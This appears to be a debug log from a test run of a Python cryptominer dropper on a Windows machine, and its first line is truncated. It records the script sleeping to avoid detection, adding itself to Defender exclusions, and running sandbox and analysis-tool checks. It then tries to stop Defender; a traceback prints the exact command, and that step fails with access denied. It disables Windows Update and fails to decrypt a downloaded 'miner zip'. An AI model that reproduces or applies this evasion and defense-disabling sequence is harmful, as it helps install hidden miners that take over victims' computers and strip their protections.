6-07-11 13:12:47,653|INFO|[MAIN] start, PID=13528, sleeping 60 seconds to avoid startup noise
2026-07-11 13:13:47,654|INFO|[MAIN] woke up, args=['C:\\Users\\hotlo\\OneDrive\\Desktop\\rebzzz.py']
2026-07-11 13:13:47,657|INFO|[EXCLUSION] adding script to Defender exclusions
2026-07-11 13:13:52,852|INFO|[EXCLUSION] done
2026-07-11 13:13:52,853|INFO|[RAM_CHECK] start
2026-07-11 13:13:52,855|DEBUG|[RAM_CHECK] total=7.72 GB
2026-07-11 13:13:52,856|INFO|[RAM_CHECK] pass
2026-07-11 13:13:52,856|INFO|[USER_CHECK] start
2026-07-11 13:13:52,862|DEBUG|[USER_CHECK] username=hotlo
2026-07-11 13:13:52,863|INFO|[USER_CHECK] pass
2026-07-11 13:13:52,863|INFO|[PROC_CHECK] start
2026-07-11 13:13:53,502|INFO|[PROC_CHECK] pass
2026-07-11 13:13:53,502|INFO|[SW_CHECK] start
2026-07-11 13:13:53,507|CRITICAL|[SW_CHECK] Tool: resource hacker version 5.2.8
2026-07-11 13:13:53,507|WARNING|TESTING: Would have exited – Tool: resource hacker version 5.2.8
2026-07-11 13:13:53,508|DEBUG|[SW_CHECK] total keys enumerated: 43
2026-07-11 13:13:53,509|INFO|[SW_CHECK] pass
2026-07-11 13:13:53,509|INFO|[GEO_CHECK] start
2026-07-11 13:13:53,509|DEBUG|[GEO_CHECK] GeoID=39
2026-07-11 13:13:53,509|INFO|[GEO_CHECK] pass via GeoID
2026-07-11 13:13:53,509|INFO|[TZ_CHECK] start
2026-07-11 13:13:53,509|DEBUG|[TZ_CHECK] timezone: Eastern Standard Time
2026-07-11 13:13:53,509|INFO|[TZ_CHECK] pass
2026-07-11 13:13:53,509|INFO|[PS_CHECK] start
2026-07-11 13:13:53,510|INFO|[PS_CHECK] no history file
2026-07-11 13:13:53,511|INFO|[HISTORY_CHECK] start
2026-07-11 13:13:53,598|DEBUG|[HISTORY_CHECK] total=12013
2026-07-11 13:13:53,598|INFO|[HISTORY_CHECK] end
2026-07-11 13:13:53,598|INFO|[MAIN] all checks passed – environment legitimate
2026-07-11 13:13:53,609|INFO|[DEFENDER_DISABLE] start
2026-07-11 13:14:04,065|ERROR|[DEFENDER_DISABLE] failed: [WinError 5] Access is denied
Traceback (most recent call last):
  File "C:\Users\hotlo\OneDrive\Desktop\rebzzz.py", line 526, in disable_defender_cloud
    subprocess.run('sc stop WinDefend', shell=True, capture_output=True, creationflags=subprocess.CREATE_NO_WINDOW)
    ~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.3824.0_x64__qbz5n2kfra8p0\Lib\subprocess.py", line 554, in run
    with Popen(*popenargs, **kwargs) as process:
         ~~~~~^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.3824.0_x64__qbz5n2kfra8p0\Lib\subprocess.py", line 1039, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
    ~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                        pass_fds, cwd, env,
                        ^^^^^^^^^^^^^^^^^^^
    ...<5 lines>...
                        gid, gids, uid, umask,
                        ^^^^^^^^^^^^^^^^^^^^^^
                        start_new_session, process_group)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.3824.0_x64__qbz5n2kfra8p0\Lib\subprocess.py", line 1554, in _execute_child
    hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
                       ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^
                             # no special security
                             ^^^^^^^^^^^^^^^^^^^^^
    ...<4 lines>...
                             cwd,
                             ^^^^
                             startupinfo)
                             ^^^^^^^^^^^^
PermissionError: [WinError 5] Access is denied
2026-07-11 13:14:04,093|INFO|[WIN_UPDATE_DISABLE] start
2026-07-11 13:14:04,296|INFO|[WIN_UPDATE_DISABLE] Windows Update disabled via policy and service stopped
2026-07-11 13:14:04,296|INFO|[DOWNLOAD] start
2026-07-11 13:14:04,297|DEBUG|[DOWNLOAD] attempt 1/3
2026-07-11 13:14:05,837|ERROR|AES decrypt: authentication failed – wrong password or corrupted file.
2026-07-11 13:14:05,838|ERROR|[DOWNLOAD] Decryption of miner zip failed
2026-07-11 13:14:05,839|CRITICAL|[PAYLOAD] preparation failed, aborting
2026-07-11 13:14:05,840|INFO|[ENV] Admin: True
2026-07-11 13:14:05,840|INFO|[ENV] Country (GeoID): Canada
2026-07-11 13:14:05,840|CRITICAL|TRIGGER_EXIT|code=999|reason=Payload preparation failed
2026-07-11 13:14:05,841|INFO|Press Enter to exit...

>>> Script will exit now. Press Enter to close this window.
